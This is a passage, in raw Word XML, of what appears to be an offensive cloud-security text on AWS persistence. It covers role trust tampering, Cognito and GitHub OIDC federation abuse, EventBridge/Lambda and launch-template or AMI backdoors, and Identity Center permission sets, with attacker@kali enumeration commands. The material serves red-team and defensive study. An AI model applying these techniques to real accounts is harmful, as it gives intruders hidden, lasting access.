        <w:t xml:space="preserve">) is less visible than creating a new user. The attacker's target in this pattern is an existing role that the organization uses frequently; the trust modification is an additional principal in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Federated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> block, often with an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ExternalId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> condition that makes it look like a vendor integration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389E6A4C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>15.2  Federation-trust abuse: OIDC and SAML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3060AF1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higher-leverage identity-persistence technique is to establish or subvert a federated identity provider. Two subfamilies matter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082ACCA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Cognito identity pools.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> An attacker who can modify a Cognito identity pool's authentication configuration (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>cognito-identity:UpdateIdentityPool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>cognito-identity:SetIdentityPoolRoles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">) can point the pool's unauthenticated role at a more privileged IAM role, and then assume that role via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>cognito-identity:GetId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>cognito-identity:GetCredentialsForIdentity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> from any anonymous client on the internet. This produces a fully anonymous entry point that bypasses MFA, password rotation, and conditional-access policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF9990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GitHub OIDC and similar.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Organizations frequently have an OIDC provider configured for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>token.actions.githubusercontent.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> so that GitHub Actions workflows can assume AWS roles. If the attacker can either (a) modify the trust policy of such a role to broaden the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> pattern (for example, from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>repo:MyOrg/MyRepo:ref:refs/heads/main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>repo:MyOrg/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>), or (b) add a new OIDC provider pointing at an attacker-controlled identity-provider endpoint, they have remote, keyless persistence. The second sub-variant is a near-invisible backdoor because most defenders never enumerate the OIDC provider list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6F84A5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="58990300"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attacker@kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># enumerate existing OIDC providers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57407A4B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="58990300"/>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iam list-open-id-connect-providers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA06C9B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="58990300"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28735C96" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="58990300"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"OpenIDConnectProviderList"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB3BE02" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="58990300"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Arn"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"arn:aws:iam::111122223333:oidc-provider/token.actions.githubusercontent.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468D328F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="58990300"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D97E14" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="58990300"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC68ED7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="58990300"/>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iam get-open-id-connect-provider \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F62DC8A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="58990300"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --open-id-connect-provider-arn \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB3A5E1" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="58990300"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    arn:aws:iam::111122223333:oidc-provider/token.actions.githubusercontent.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEF5313" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="58990300"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2452CB6F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="58990300"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"ClientIDList"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>: [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"sts.amazonaws.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17531866" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="58990300"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"ThumbprintList"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>: [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"6938fd4d98bab03faadb97b34396831e3780aea1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DBC7EF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="58990300"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Url"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"https://token.actions.githubusercontent.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F921596" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="58990300"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1252D557" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="58990300"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attacker@kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># find roles trusting it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECF26C7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="58990300"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attacker@kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> cloudfox aws role-trusts --profile attacker --filter-oidc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0F4E4D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>15.3  Compute persistence: Lambda, EventBridge, Launch Templates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323BA7A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Compute persistence is about running attacker code on a trigger that the attacker does not have to initiate. The canonical persistence pair in AWS is an EventBridge rule that matches a broad event (for example, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>rate(1 hour)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, or every </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ConsoleLogin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">) and a Lambda target that executes attacker-controlled code. Because the Lambda's execution role can be a widely-scoped role already in the organization, the persistence footprint is: one rule, one target pointer, one benign-looking IAM policy. There is no Lambda function </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>created</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> if the attacker reuses one that already exists (per </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>lambda:UpdateFunctionCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Chapter 10).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359C918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Launch templates are a persistence primitive for EC2 fleets: an attacker who can </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ec2:CreateLaunchTemplateVersion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and make that version the default sets the user-data script, AMI, or instance-profile for every future instance launched from the template. Organizations that use Auto Scaling groups refreshed on a nightly basis will see attacker code running on every instance after the next refresh, with the attacker's chosen instance profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5287E7A5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:divId w:val="1916165121"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Operator note: AMI persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CE8B98" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:spacing w:after="216"/>
        <w:divId w:val="1916165121"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">An alternative launch-template persistence is to create a new AMI (via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ec2:CreateImage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">) that contains an attacker-controlled cloud-init hook, and swap the launch template to use it. The AMI is a full VM image; the attacker can bake in a systemd service that reaches out to a C2 channel. This is the closest AWS gets to traditional disk-based persistence, and it survives a rebuild of the environment's Terraform if the Terraform reads the AMI id from a data source like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws_ami_ids</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> that matches the attacker's tag pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CE1A38" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>15.4  Configuration persistence: Identity Center, Organizations, SCPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D07B3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Configuration persistence is the highest-leverage family and the hardest to detect. Four patterns matter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A13882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Identity Center (formerly AWS SSO) permission sets.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> An attacker who can </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sso-admin:CreatePermissionSet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sso-admin:PutInlinePolicyToPermissionSet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sso-admin:CreateAccountAssignment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> can grant themselves (or a user they control) access to every account in the Organization via a single permission-set assignment. Because Identity Center is a root-level service, the footprint lives outside every individual account; a target-account compromise investigation will not find it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5C241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Organizations SCPs.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Removing an SCP (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
